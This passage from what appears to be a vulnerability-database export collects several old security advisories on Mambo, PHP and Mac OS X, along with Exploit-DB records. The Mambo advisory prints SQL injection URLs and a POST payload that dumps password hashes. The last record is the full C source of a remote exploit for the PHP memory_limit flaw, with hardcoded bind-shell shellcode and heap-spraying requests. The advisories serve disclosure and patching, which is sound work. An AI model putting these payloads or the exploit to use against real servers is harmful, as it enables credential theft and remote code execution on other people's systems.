$database;\r\n$dblink="index.php?option=$menu_option";\r\nif ($Itemid!="" && $Itemid!=0) {\r\n $database->setQuery( "SELECT access FROM #__menu WHERE id='$Itemid'" );\r\n} else {\r\n if ($task!="") {\r\n $dblink.="&task=$task";\r\n }\r\n $database->setQuery( "SELECT access FROM #__menu WHERE link like \r\n'$dblink%'" );\r\n}\r\n$results = $database->loadObjectList();\r\n$access = 0;\r\n//echo "<pre>"; print_r($results); echo "</pre>";\r\nforeach ($results as $result) {\r\n $access = max( $access, $result->access );\r\n}\r\nreturn ($access <= $gid);\r\n}\r\n\r\nAs seen in the above code the unsanitized $task variable will be\r\nused in the query as long as $Itemid is empty.\r\n\r\nhttp://mambo/index2.php?option=com_content&task=-99'%20UNION%20SELECT%201%20FROM%20\r\nmos_users%20WHERE%20username='admin'%20AND%20MID(password,1,1)='2'/*&id=24&Itemid=0\r\n\r\nIf the first character from the password hash belonging to the\r\nuser "admin" is two as specified above then Mambo displays the\r\nerror "You need to login". This is an easy issue to exploit,\r\nand unfortunately mosMenuCheck() is called in the same unsafe\r\nmanner from other files as well. Last but not least there is an\r\nSQL Injection issue in the "com_content" component, particularly\r\nthe showCategory() function.\r\n\r\n// get the total number of published items in the category\r\n// filter functionality\r\n$filter = trim( mosGetParam( $_POST, 'filter', '' ) );\r\n$filter = strtolower( $filter );\r\n$and = '';\r\nif ( $filter ) {\r\n if ( $params->get( 'filter' ) ) {\r\n switch ( $params->get( 'filter_type' ) ) {\r\n case 'title':\r\n $and = "\n AND LOWER( a.title ) LIKE '%". $filter ."%'";\r\n break;\r\n case 'author':\r\n $and = "\n AND ( ( LOWER( u.name ) LIKE '%". $filter ."%' ) OR\r\n ( LOWER( a.created_by_alias ) LIKE '%". $filter ."%' ) )";\r\n break;\r\n case 'hits':\r\n $and = "\n AND a.hits LIKE '%". $filter ."%'";\r\n break;\r\n }\r\n }\r\n\r\n}\r\n\r\nAs you can see from the above code, the $filter variable is passed\r\nto the query completely unsanitized, and allows for easy to exploit\r\nSQL Injection. This is very dangerous.\r\n\r\nfilter=' UNION SELECT \r\n1,2,3,4,CONCAT(username,CHAR(58),password),6,7,8,9,1 FROM mos_users\r\nWHERE \r\n1/*&order=rdate&limit=10&id=0&sectionid=&task=category&option=com_content\r\n\r\nThe above data sent in a post request to the vulnerable script will\r\neffectively dump every single username and password hash in the\r\ndatabase to the attacker. It should be noted that the above attacks are\r\nonly effective in the default php enviornment of magic_quotes_gpc off\r\n\r\n\r\n\r\nArbitrary File Inclusion:\r\nIt is possible to include arbitrary local files, and ultimately execute\r\ncode within the vulnerable Mambo Open Source installation. The problem\r\nlies in the _setTemplate() function not properly sanitizing GPC data.\r\n\r\n// TemplateChooser Start\r\n$mos_user_template = mosGetParam( $_COOKIE, 'mos_user_template', '' );\r\n$mos_change_template = mosGetParam( $_REQUEST, 'mos_change_template', \r\n$mos_user_template );\r\nif ($mos_change_template) {\r\n // check that template exists in case it was deleted\r\n if (file_exists( \r\n"$mosConfig_absolute_path/templates/$mos_change_template/index.php" )) {\r\n $lifetime = 60*10;\r\n $cur_template = $mos_change_template;\r\n setcookie( "mos_user_template", "$mos_change_template", time()+$lifetime);\r\n } else {\r\n setcookie( "mos_user_template", "", time()-3600 );\r\n }\r\n}\r\n\r\nAs seen in the above code, there are several unsanitized variables\r\nintroduced into the function, and $mos_change_template in particular\r\nis ultimately set as the current template and used through out the\r\napplication. There are never any effective traversal checks, so we\r\ncan include arbitrary locations on the local machine, and in some\r\ncases execute arbitrary code as long as the file is named index.php\r\n(i.e. /tmp/index.php) The reason for the restrictions are because\r\nof the strip_tags call in mosGetParam, but some older versions of php\r\ndo not use a binary safe strip_tags (CAN-2004-0595) which allows for\r\nnull characters. So, in those cases the file inclusion is much more\r\ndangerous and easy to exploit.\r\n\r\n\r\n\r\nSolution:\r\nThere has been a new version of the Mambo software released to fix\r\nthe previously mentioned vulnerabilities.\r\n\r\nhttp://mamboxchange.com/frs/?group_id=5\r\n\r\nThe above link contains all of the relative patches as well as the\r\nsecured full releases. Users are encouraged to upgrade their Mambo\r\ninstallations as soon as possible.\r\n\r\n\r\n\r\nCredits:\r\nJames Bercegay of the GulfTech Security Research Team\r\n\r\n\r\n\r\nRelated Info:\r\nThe original advisory can be found at the following location\r\nhttp://www.gulftech.org/?node=research&article_id=00104-02242006\r\n\r\n", "modified": "2006-02-25T00:00:00", "published": "2006-02-25T00:00:00", "id": "SECURITYVULNS:DOC:11592", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:11592", "title": "Mambo Multiple Vulnerabilities", "type": "securityvulns", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-08-31T11:10:10", "bulletinFamily": "software", "description": "-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\n e-matters GmbH\r\n www.e-matters.de\r\n\r\n -= Security Advisory =-\r\n\r\n\r\n\r\n Advisory: PHP memory_limit remote vulnerability\r\n Release Date: 2004/07/14\r\nLast Modified: 2004/07/14\r\n Author: Stefan Esser [s.esser@e-matters.de]\r\n\r\n Application: PHP <= 4.3.7\r\n PHP5 <= 5.0.0RC3\r\n Severity: A vulnerability within PHP allows remote code\r\n execution on PHP servers with activated memory_limit\r\n Risk: Critical\r\nVendor Status: Vendor has released a bugfixed version.\r\n Reference: http://security.e-matters.de/advisories/112004.html\r\n\r\n\r\nOverview:\r\n\r\n PHP is a widely-used general-purpose scripting language that is \r\n especially suited for Web development and can be embedded into HTML.\r\n\r\n According to Security Space PHP is the most popular Apache module\r\n and is installed on about 50% of all Apaches worldwide. This figure\r\n includes of course only those servers that are not configured with\r\n expose_php=Off.\r\n \r\n During a reaudit of the memory_limit problematic it was discovered \r\n that it is possible for a remote attacker to trigger the memory_limit\r\n request termination in places where an interruption is unsafe. This\r\n can be abused to execute arbitrary code on remote PHP servers.\r\n \r\n \r\nDetails:\r\n \r\n On the 28th June 2004 Gregori Guninski released his advisory about\r\n a possible remote DOS vulnerability within Apache 2 (CAN-2004-0493).\r\n This vulnerability allows tricking Apache 2 into acception arbitrary\r\n sized HTTP headers. Guninski and many others rated this bug as "Low\r\n Risk" for 32bit systems, but they did not take into account that \r\n such a bug could have a huge impact on 3rd party modules.\r\n \r\n After his advisory was released I reaudited PHP's memory_limit \r\n request termination, because this bug made it possible to reach the \r\n memory_limit at places that were never meant to be interrupted. \r\n After a possible exploitation path for Apache 2 servers was \r\n discovered and a working exploit was created, similar pathes were \r\n found and added to the proof of concept exploit that allowed\r\n exploitation of NON Apache 2 servers. (f.e. Apache 1.3.31)\r\n \r\n The idea of the exploit is simple. When PHP allocates a block of\r\n memory it first checks in the cache of free memory blocks for a block\r\n of the same size. If such a block is found it is taken from the cache\r\n otherwise PHP checks if an allocation would violate the memory_limit.\r\n In that case the request shutdown is triggered through zend_error(). \r\n (PHP < 4.3.7 aborts after the violating memory block is allocated)\r\n PHP contains several places where such an interruption is unsafe.\r\n An example for such places are those where Zend HashTables are \r\n allocated and initialised. This is performed in 2 steps and the\r\n initialisation step itself allocates memory before important members\r\n are correctly initialised. An attacker that is able to trigger the\r\n memory_limit abort within zend_hash_init() and is additionally able\r\n to control the heap before the HashTable itself is allocated, is \r\n able to supply his own HashTable destructor pointer.\r\n \r\n Several places within PHP where found where this action is performed\r\n on HashTables that actually get destructed by the request shutdown.\r\n One of such places is f.e. within the fileupload code, but is only \r\n triggerable on Apache 2 servers that are vulnerable to CAN-2004-0493, \r\n another one is only reachable if variables_order was changed to have \r\n the "E" in the end, a third one is within session extension which is \r\n activated by default but the vulnerability can not be triggered if\r\n the session functionality is not used. A fourth place is within the\r\n implementation of the register_globals functionality. Although this\r\n is deactivated by default since PHP 4.2 it is activated on nearly\r\n all servers that have to ensure compatibility with older scripts.\r\n Other places might exist in not default activated or 3rd party\r\n extensions.\r\n \r\n All mentioned places outside of the extensions are quite easy to\r\n exploit, because the memory allocation up to those places is \r\n deterministic and quite static throughout different PHP versions.\r\n The only unknown entity is the size of the environment vars array.\r\n But that is usually small and can be bruteforced with some kind\r\n of binary search algorithm. Additionally this information could\r\n leak to an attacker through an open phpinfo() page. If the admin\r\n used php.ini-recommended as configuration basis it is irrelevant\r\n anyway because the ENV array is not populated in that case.\r\n \r\n Because the exploit itself consist of supplying an arbitrary \r\n destructor pointer this bug is exploitable on any platform.\r\n (Except the system runs with non exec heap+stack protection)\r\n This includes systems running Hardened-PHP <= 0.1.2 because they\r\n have no protection of the HashTable destructor pointer.\r\n \r\n As a last word it should be said, that an attacker does not need\r\n to send 8/16/64MB (or whatever the memory_limit is) per attack.\r\n With POST requests it is quite easy to eat 100 (and more) times \r\n the amount of sent bytes.\r\n\r\n\r\nProof of Concept:\r\n\r\n e-matters is not going to release an exploit for this vulnerability\r\n to the public.\r\n \r\n\r\nDisclosure Timeline:\r\n\r\n 07. July 2004 - Vendor-sec was informed about the fact that this\r\n vulnerability was found\r\n 14. July 2004 - Public Disclosure\r\n\r\n\r\nCVE Information:\r\n\r\n The Common Vulnerabilities and Exposures project (cve.mitre.org) has\r\n assigned the name CAN-2004-0594 to this issue.\r\n\r\n \r\nRecommendation:\r\n\r\n If you are running PHP with compiled in memory_limit support, it is\r\n strongly recommended that you upgrade as soon as possible to the \r\n newest version. Disabling memory_limit within your configuration can\r\n be considered a workaround, but leaves your site vulnerable to \r\n memory hungry PHP scripts or POST requests that create huge variables.\r\n If you are running PHP with Apache <= 2.0.49 ensure that you have the\r\n fix for CAN-2004-0493 applied.\r\n \r\n \r\nGPG-Key:\r\n\r\n http://security.e-matters.de/gpg_key.asc\r\n \r\n pub 1024D/3004C4BC 2004-05-17 e-matters GmbH - Securityteam \r\n Key fingerprint = 3FFB 7C86 7BE8 6981 D1DA A71A 6F7D 572D 3004 C4BC\r\n\r\n\r\nCopyright 2004 Stefan Esser. All rights reserved.\r\n\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.0.6 (GNU/Linux)\r\nComment: For info see http://www.gnupg.org\r\n\r\niD8DBQFA9Icab31XLTAExLwRAuvFAKCzOMXUnIaj0CkCW0GxXg08YErusACgmU8z\r\n5d1swwTrHOVQLKmruY+pea0=\r\n=H98x\r\n-----END PGP SIGNATURE-----\r\n\r\n_______________________________________________\r\nFull-Disclosure - We believe in it.\r\nCharter: http://lists.netsys.com/full-disclosure-charter.html", "modified": "2004-07-14T00:00:00", "published": "2004-07-14T00:00:00", "id": "SECURITYVULNS:DOC:6484", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:6484", "title": "[Full-Disclosure] Advisory 11/2004: PHP memory_limit remote vulnerability", "type": "securityvulns", "cvss": {"score": 6.4, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-08-31T11:10:12", "bulletinFamily": "software", "description": "\r\n-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\n\r\n\r\n Technical Cyber Security Alert TA05-136A \r\n Apple Mac OS X is affected by multiple vulnerabilities\r\n\r\n Original release date: May 16, 2005\r\n Last revised: --\r\n Source: US-CERT\r\n\r\nSystems Affected\r\n\r\n Mac OS X version 10.3.9 (Panther) and Mac OS X Server version 10.3.9\r\n\r\nOverview\r\n\r\n Apple has released Security Update 2005-005 to address multiple\r\n vulnerabilities affecting Mac OS X and Mac OS X Server. The most\r\n serious of these vulnerabilities may allow a remote attacker to\r\n execute arbitrary code. Impacts of other vulnerabilities addressed by\r\n the update include disclosure of information and denial of service.\r\n\r\nI. Description\r\n\r\n Apple Security Update 2005-005 resolves a number of vulnerabilities\r\n affecting Mac OS X and OS X Server. Further details are available in\r\n the following Vulnerability Notes:\r\n\r\n VU#356070 - Apple Terminal fails to properly sanitize input for\r\n x-man-page URI\r\n\r\n Apple Terminal on Mac OS X fails to sanitize x-man-page URIs, allowing\r\n a remote attacker to execute arbitrary commands.\r\n (CAN-2005-1342)\r\n\r\n VU#882750 - libXpm image library vulnerable to buffer overflow\r\n\r\n libXpm image parsing code contains a buffer-overflow vulnerability\r\n that may allow a remote attacker execute arbitrary code or cause a\r\n denial-of-service condition.\r\n (CAN-2004-0687)\r\n\r\n VU#125598 - LibTIFF vulnerable to integer overflow via corrupted\r\n directory entry count\r\n\r\n An integer overflow in LibTIFF may allow a remote attacker to execute\r\n arbitrary code.\r\n (CAN-2004-1308)\r\n\r\n VU#539110 - LibTIFF vulnerable to integer overflow in the\r\n TIFFFetchStrip() routine\r\n\r\n An integer overflow in LibTIFF may allow a remote attacker to execute\r\n arbitrary code.\r\n (CAN-2004-1307)\r\n\r\n VU#537878 - libXpm library contains multiple integer overflow\r\n vulnerabilities\r\n\r\n libXpm contains multiple integer-overflow vulnerabilities that may\r\n allow a remote attacker execute arbitrary code or cause a\r\n denial-of-service condition.\r\n (CAN-2004-0688)\r\n\r\n VU#331694 - Apple Mac OS X chpass/chfn/chsh utilities do not properly\r\n validate external programs\r\n\r\n Mac OS X Directory Service utilities do not properly validate code\r\n paths to external programs, potentially allowing a local attacker to\r\n execute arbitrary code.\r\n (CAN-2004-1335)\r\n\r\n VU#582934 - Apple Mac OS X Foundation framework vulnerable to buffer\r\n overflow via incorrect handling of an environmental variable\r\n\r\n A buffer overflow in Mac OS X's Foundation Framework's processing of\r\n environment variables may lead to elevated privileges.\r\n (CAN-2004-1336)\r\n\r\n VU#706838 - Apple Mac OS X vulnerable to buffer overflow via vpnd\r\n daemon\r\n\r\n Apple Mac OS X contains a buffer overflow in vpnd that could allow a\r\n local, authenticated attacker to execute arbitrary code with root\r\n privileges.\r\n (CAN-2004-1343)\r\n\r\n VU#258390 - Apple Mac OS X with Bluetooth enabled may allow file\r\n exchange without prompting users\r\n\r\n Apple Mac OS X with Bluetooth support may unintentionally allow files\r\n to be exchanged with other systems by default.\r\n (CAN-2004-1332)\r\n\r\n VU#354486 - Apple Mac OS X Server Netinfo Setup Tool fails to validate\r\n command line parameters\r\n\r\n Apple Mac OS X Server NeST tool contains a vulnerability in the\r\n processing of command line arguments that could allow a local attacker\r\n to execute arbitrary code.\r\n (CAN-2004-0594)\r\n \r\n Please note that Apple Security Update 2005-005 addresses additional\r\n vulnerabilities not described above. As further information becomes\r\n available, we will publish individual Vulnerability Notes.\r\n\r\nII. Impact\r\n\r\n The impacts of these vulnerabilities vary, for information about\r\n specific impacts please see the Vulnerability Notes. Potential\r\n consequences include remote execution of arbitrary code or commands,\r\n disclosure of sensitive information, and denial of service.\r\n\r\nIII. Solution\r\n\r\nInstall an Update\r\n\r\n Install the update as described in Apple Security Update 2005-005.\r\n\r\nAppendix A. References\r\n\r\n * US-CERT Vulnerability Note VU#582934 -\r\n <http://www.kb.cert.org/vuls/id/582934>\r\n \r\n * US-CERT Vulnerability Note VU#258390 -\r\n <http://www.kb.cert.org/vuls/id/258390>\r\n \r\n * US-CERT Vulnerability Note VU#331694 -\r\n <http://www.kb.cert.org/vuls/id/331694>\r\n\r\n * US-CERT Vulnerability Note VU#706838 -\r\n <http://www.kb.cert.org/vuls/id/706838>\r\n\r\n * US-CERT Vulnerability Note VU#539110 -\r\n <http://www.kb.cert.org/vuls/id/539110>\r\n\r\n * US-CERT Vulnerability Note VU#354486 -\r\n <http://www.kb.cert.org/vuls/id/354486>\r\n\r\n * US-CERT Vulnerability Note VU#882750 -\r\n <http://www.kb.cert.org/vuls/id/882750>\r\n\r\n * US-CERT Vulnerability Note VU#537878 -\r\n <http://www.kb.cert.org/vuls/id/537878>\r\n\r\n * US-CERT Vulnerability Note VU#125598 -\r\n <http://www.kb.cert.org/vuls/id/125598>\r\n\r\n * US-CERT Vulnerability Note VU#356070 -\r\n <http://www.kb.cert.org/vuls/id/356070>\r\n\r\n * Apple Security Update 2005-005 -\r\n <http://docs.info.apple.com/article.html?artnum=301528>\r\n _________________________________________________________________\r\n\r\n These vulnerabilities were discovered by several people and reported\r\n in Apple Security Update 2005-005. Please see the Vulnerability Notes\r\n for individual reporter acknowledgements.\r\n _________________________________________________________________\r\n\r\n Feedback can be directed to the authors: Jeffrey Gennari and Jason\r\n Rafail.\r\n _________________________________________________________________\r\n\r\n Copyright 2005 Carnegie Mellon University. Terms of use\r\n\r\n Revision History\r\n\r\n May 16, 2005: Initial release\r\n Last updated May 16, 2005 \r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.2.1 (GNU/Linux)\r\n\r\niQEVAwUBQojwRBhoSezw4YfQAQKb1gf/a7XQAZQR+t5+FpzRoUrJyVIg3Mf1IISP\r\nyS5GLgfwC+4GuDEd/BA51+591OhNAWa1hO2JAUQwJ799VL7vAY6vbDW84c+S0eQ+\r\nJ+FHgddUsuvRtmsXCg2Fin1JRG4hCqBQ9q2S0h4+fM7yWSdLOY7xeAAwPOwG+bsU\r\nAVjDMNiPACHxw7CNQ8qpPXFfo3qrV+oj55F62TbR0fujtil6yQR3lE9wSeiuLs/i\r\nKgQFZlHMEoAwQnghwLk7eQLkzGD9eAZ+pZ7Ny0AvF7avhGflh2nFNe2acFoJ2Iw7\r\n/gMXj/uN/ZpDssS37y38LIvyA3kIQrSlEW7iKf1wi2eQ3ntjyv/9NA==\r\n=uqBU\r\n-----END PGP SIGNATURE-----", "modified": "2005-05-17T00:00:00", "published": "2005-05-17T00:00:00", "id": "SECURITYVULNS:DOC:8636", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:8636", "title": "US-CERT Technical Cyber Security Alert TA05-136A -- Apple Mac OS X is affected by multiple vulnerabilities", "type": "securityvulns", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "exploitdb": [{"lastseen": "2016-02-02T22:55:35", "bulletinFamily": "exploit", "description": "PHP 4.x/5.0 Strip_Tags() Function Bypass Vulnerability. CVE-2004-0595. Remote exploit for php platform", "modified": "2004-07-14T00:00:00", "published": "2004-07-14T00:00:00", "id": "EDB-ID:24280", "href": "https://www.exploit-db.com/exploits/24280/", "type": "exploitdb", "title": "PHP 4.x/5.0 Strip_Tags Function Bypass Vulnerability", "sourceData": "source: http://www.securityfocus.com/bid/10724/info\r\n\r\nIt is reported that it is possible to bypass PHPs strip_tags() function.\r\n\r\nIt is reported that under certain circumstances, PHPs strip_tags() function will improperly leave malformed tags in place.\r\n\r\nThis vulnerability may mean that previously presumed-safe web applications could contain multiple cross-site scripting and HTML injection vulnerabilities when viewed by Microsoft Internet Explorer or Apple Safari web browsers.\r\n\r\nIt is reported that 'magic_quotes_gpc' must be off for PHP to be vulnerable to this issue. \r\n\r\nIf a web application uses strip_tags() similar to:\r\n$example = strip_tags($_REQUEST['user_input'], \"<b><i><s>\");\r\n\r\nThen possible tags that may lead to exploitation might be:\r\n<\\0script> or <s\\0cript> ", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/24280/"}, {"lastseen": "2016-01-31T12:37:49", "bulletinFamily": "exploit", "description": "PHP <= 4.3.7/ 5.0.0RC3 memory_limit Remote Exploit. CVE-2004-0594. Remote exploit for linux platform", "modified": "2004-11-27T00:00:00", "published": "2004-11-27T00:00:00", "id": "EDB-ID:660", "href": "https://www.exploit-db.com/exploits/660/", "type": "exploitdb", "title": "PHP <= 4.3.7/ 5.0.0RC3 memory_limit Remote Exploit", "sourceData": "/* Remote exploit for the php memory_limit vulnerability found by Stefan \r\n * Esser in php 4 (<= 4.3.7) and php 5 (<= 5.0.0RC3).\r\n * \r\n * by Gyan Chawdhary (gunnu45@hotmail.com)\r\n * (felinemenace.org/~gyan)\r\n * \r\n * Greets\r\n * S.Esser for the vuln and mlxdebug.tgz, everything in the code is based on it.\r\n * scrippie, gera, riq, jaguar, girish, n2n ... \r\n *\r\n * Vulnerability:\r\n * The issue is well documented in the advisory. \r\n *\r\n * Exploitation:\r\n * I cud not find a generic way to free a 40 byte chunk which could be later\r\n * used by ALLOC_HASHTABLE. The exploit will construct a fake zend hash table \r\n * which will be sent in the first request. The second request will kick in the\r\n * memory interuption after allocating space for the hashtable and before it is\r\n * initalized. The memory it will use for this allocation will contain the data\r\n * from our previous request which includes the pDestructor pointer pointing to\r\n * our nop+shellcode which is a part of the second request. This happens in the \r\n * zend_hash_destory function. \r\n *\r\n * PS - The exploit is ugly, coded to test the vuln. If anyone knows the trick \r\n * for 40 byte free() then plz drop me a mail. Tested on RH 8 php 4.3.7,\r\n * Apache 2.0.49 with register_globals = On \r\n *\r\n * Gyan\r\n *\r\n * \r\n */\r\n\r\n#include <stdio.h>\r\n#include <string.h>\r\n#include <unistd.h>\r\n\r\n#include <sys/socket.h>\r\n#include <sys/types.h>\r\n#include <netinet/in.h>\r\n\r\n#define IP \"127.0.0.1\"\r\n#define PORT 80\r\nint sock;\r\nstruct sockaddr_in s;\r\n\r\nchar request1[]=\r\n\"POST /info.php?a[1]=test HTTP/1.0\"\r\n\"Host: doesnotreallymatter\\r\\n\"\r\n\"User-Agent: mlxdebug\\r\\n\"\r\n\"Accept: text/html\\r\\n\"\r\n\"Connection: close\\r\\n\"\r\n\"Pragma: no-cache\\r\\n\"\r\n\"Cache-Control: no-cache\\r\\n\"\r\n\"Content-Type: multipart/form-data; boundary=------------ \\r\\n BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB \\r\\n\";\r\n\r\nchar request2[]=\r\n\"---------------264122487026375\\r\\n\"\r\n\"Content-Length: 472\\r\\n\"\r\n\"\\r\\n\"\r\n\"-----------------------------264122487026375\\r\\n\"\r\n\"Content-Disposition: form-data; name=\\\"a[][]\\\"\\r\\n\"\r\n\"\\r\\n\"\r\n\"TESTTESTTESTTESTTESTTESTTESTTESTTESTTES \\r\\n\"\r\n\"\\r\\n\"\r\n\"-----------------------------264122487026375--\\r\\n\";\r\n\r\nchar request3[]=\r\n\"POST /info.php?a[1]=test HTTP/1.0\"\r\n\"Host: doesnotreallymatter\\r\\n\"\r\n\"User-Agent: mlxdebug\\r\\n\"\r\n\"Accept: text/html\\r\\n\"\r\n\"Connection: close\\r\\n\"\r\n\"Pragma: no-cache\\r\\n\"\r\n\"Cache-Control: no-cache\\r\\n\"\r\n\"Content-Type: multipart/form-data; boundary=-------------\";\r\n\r\nchar request4[]=\r\n\"---------------264122487026375\\r\\n\"\r\n\"Content-Length: 472\\r\\n\"\r\n\"\\r\\n\"\r\n\"-----------------------------264122487026375\\r\\n\"\r\n\"Content-Disposition: form-data; name=\\\"a[][]\\\"\\r\\n\"\r\n\"\\r\\n\"\r\n\"TESTTESTTESTTESTTESTTESTTESTTESTTESTTES \\r\\n\"\r\n\"-----------------------------264122487026375--\\r\\n\";\r\n\r\n/*Ripped shellcode. Runs on port 36864*/\r\nchar shell[]=\r\n\"\\xeb\\x72\\x5e\\x29\\xc0\\x89\\x46\\x10\\x40\\x89\\xc3\\x89\\x46\\x0c\"\r\n\"\\x40\\x89\\x46\\x08\\x8d\\x4e\\x08\\xb0\\x66\\xcd\\x80\\x43\\xc6\\x46\"\r\n\"\\x10\\x10\\x66\\x89\\x5e\\x14\\x88\\x46\\x08\\x29\\xc0\\x89\\xc2\\x89\"\r\n\"\\x46\\x18\\xb0\\x90\\x66\\x89\\x46\\x16\\x8d\\x4e\\x14\\x89\\x4e\\x0c\"\r\n\"\\x8d\\x4e\\x08\\xb0\\x66\\xcd\\x80\\x89\\x5e\\x0c\\x43\\x43\\xb0\\x66\"\r\n\"\\xcd\\x80\\x89\\x56\\x0c\\x89\\x56\\x10\\xb0\\x66\\x43\\xcd\\x80\\x86\"\r\n\"\\xc3\\xb0\\x3f\\x29\\xc9\\xcd\\x80\\xb0\\x3f\\x41\\xcd\\x80\\xb0\\x3f\"\r\n\"\\x41\\xcd\\x80\\x88\\x56\\x07\\x89\\x76\\x0c\\x87\\xf3\\x8d\\x4b\\x0c\"\r\n\"\\xb0\\x0b\\xcd\\x80\\xe8\\x89\\xff\\xff\\xff/bin/sh\";\r\n\r\n\r\nvoid xp_connect(char *ip)\r\n{\r\n char buffer[1024];\r\n char temp[1024];\r\n int tmp;\r\n\r\n s.sin_family = AF_INET;\r\n s.sin_port = htons(PORT);\r\n s.sin_addr.s_addr = inet_addr(ip);\r\n\r\n if ((sock = socket(AF_INET, SOCK_STREAM, 0)) < 0)\r\n {\r\n printf(\"Cannot create socket\\n\");\r\n exit(-1);\r\n }\r\n\r\n if((connect(sock,(struct sockaddr *)&s,sizeof(struct sockaddr))) < 0)\r\n {\r\n printf(\"Cannot connect()\\n\");\r\n exit(-1);\r\n }\r\n}\r\n\r\nvoid xp_write(char *data)\r\n{\r\n\r\n if(write (sock, data, strlen(data)) < 0)\r\n {\r\n printf(\"write() failed\\n\");\r\n exit(-1);\r\n }\r\n}\r\n\r\nvoid xp_receive()\r\n{\r\n int tmp;\r\n char buffer[1024*2];\r\n \r\n \tif ( (tmp = read(sock, buffer, sizeof(buffer))) <= 0)\r\n {\r\n printf(\"read() failed\\n\");\r\n exit(-1);\r\n }\r\n}\r\n\r\nchar fill[] = \" \\r\\n %s \\r\\n \";\r\n\r\n/*This function builds the main request. In destroy_uploaded_files_hash we\r\n * need to pass zend_hash_apply to reach zend_hash_destroy. \r\n * We set \r\n * 1) ht->nApplyCount to 0x02020202 to pass HASH_PROTECT_RECURSION \r\n * 2) p->pListNext = 0x00000000 to exit out of zend_hash_apply\r\n * 3) ht->pDestructor = addr to nop+shellcode\r\n * 0x402c22bc <zend_hash_destroy+184>: sub $0xc,%esp\r\n * 0x402c22bf <zend_hash_destroy+187>: pushl 0x8(%esi)\r\n * 0x402c22c2 <zend_hash_destroy+190>: call *%eax\r\n * 0x402c22c4 <zend_hash_destroy+192>: add $0x10,%esp\r\n *\r\n * $eax = ht->pDestructor\r\n */\r\n\r\nvoid build1(int size, int count)\r\n{\r\n\t char *p1, *p2;\r\n\t char *b1, *b2;\r\n\t int i;\r\n\t\tint pot = 0xffffffff;\r\n\t\tint got = 0x41414141;\r\n\t\tint bot = 0x0818ef29; //0x0818ef78;//0x08189870; //0x402b6c08;\r\n\t\tint sot = 0x02020202;\r\n\t\tint ret = 0x081887a8;\r\n\r\n\t\tb1 = (char *)malloc(size-8);\r\n p1 = b1;\r\n\r\n\t\tfor (i=0; i<size-8; i+=36) \r\n\t\t{\r\n\t\t*( (int **)p1 ) = (int *)( pot );\r\n\t\tp1+=4;\r\n\t\t*( (int **)p1 ) = (int *)( got );\r\n\t\tp1+=4;\r\n\t\t*( (int **)p1 ) = (int *)( bot );\r\n\t\tp1+=4;\r\n\t\t*( (int **)p1 ) = (int *)( ret );\r\n p1+=4;\r\n *( (int **)p1 ) = (int *)( bot );\r\n p1+=4;\r\n\t\t*( (int **)p1 ) = (int *)( got );\r\n\t p1+=4;\r\n\t *( (int **)p1 ) = (int *)( bot );\r\n\t p1+=4;\r\n\t\t*( (int **)p1 ) = (int *)( sot );\r\n\t\tp1+=4;\r\n\t\t}\r\n\r\n\t b2 = (char *)malloc(size+1);\r\n\t p2 = b2;\r\n\r\n\t\tsprintf(p2, fill, b1);\r\n\r\n\t for(i=0; i<count; i++)\r\n xp_write(b2);\r\n}\r\n\r\n/*Test function for resetting php memory , does not work properly with \r\n * php_normalize_heap function */\r\nvoid build2(int size, int count)\r\n{\r\n char *p1, *p2;\r\n char *b1, *b2;\r\n int i;\r\n b1 = (char *)malloc(size-8);\r\n p1 = b1;\r\n memset(p1, '\\x42', size-8);\r\n b2 = (char *)malloc(size+1);\r\n p2 = b2;\r\n sprintf(p2, fill, b1);\r\n for(i=0; i<count; i++)\r\n xp_write(b2);\r\n}\r\n\r\n/*TODO*/\r\nchar *php_normalize_heap()\r\n{\r\n\treturn;\r\n}\r\n\r\n/*Builds our shellcode with NOP's and the mem interuption request*/\r\n\r\nvoid build3(int size, int count)\r\n{\r\n char *p1, *p2;\r\n char *b1, *b2;\r\n int i;\r\n int pot = 0x90909090;\r\n\r\n\t b1 = (char *)malloc(size-8);\r\n p1 = b1;\r\n \r\n \t for (i=0; i<size-8-strlen(shell); i+=4) {\r\n\t\t *( (int **)p1 ) = (int *)( pot );\r\n\t p1+=4;\r\n }\r\n \t\tp1 = b1;\r\n\r\n\t\tp1+= size - 8 - strlen(shell);\r\n\t\tstrncpy(p1, shell, strlen(shell));\r\n \t \r\n \t b2 = (char *)malloc(size+1);\r\n p2 = b2;\r\n\r\n sprintf(p2, fill, b1);\r\n\r\n for(i=0; i<count; i++)\r\n\t xp_write(b2);\r\n\t }\r\n\t \r\n\r\n\r\nvoid exploit()\r\n{\r\n\r\n\tint i; \r\n\t\r\n\tprintf(\"Stage 1: Filling mem with bad pdestructor ... \");\r\n\tfor (i=0; i< 5; i++)\r\n\t{\t\r\n \t xp_connect(IP);\r\n \t xp_write(request1);\r\n build1(5000, 1);\r\n xp_write(request2);\r\n\t close(sock);\r\n\t}\r\n\tprintf(\"DONE\\r\\n\");\r\n\tprintf(\"Stage 2: Triggering memory_limit now ... \");\r\n\t\t\r\n\txp_connect(IP);\r\n xp_write(request3);\r\n build3(8192, 255);\r\n build3(7265, 1);\r\n xp_write(request4);\r\n\tprintf(\"DONE\\r\\n\");\r\n\tprintf(\"Shell on port 36864\\r\\n\");\r\n\t\r\n}\r\n\r\nmain()\r\n{\r\n\t/*No args, no vectors*/\r\n\texploit();\r\n}\r\n\r\n/*\r\n * Using [][][][] arry its possible to exhaust mem for 1.3.* servers and \r\n *trigger 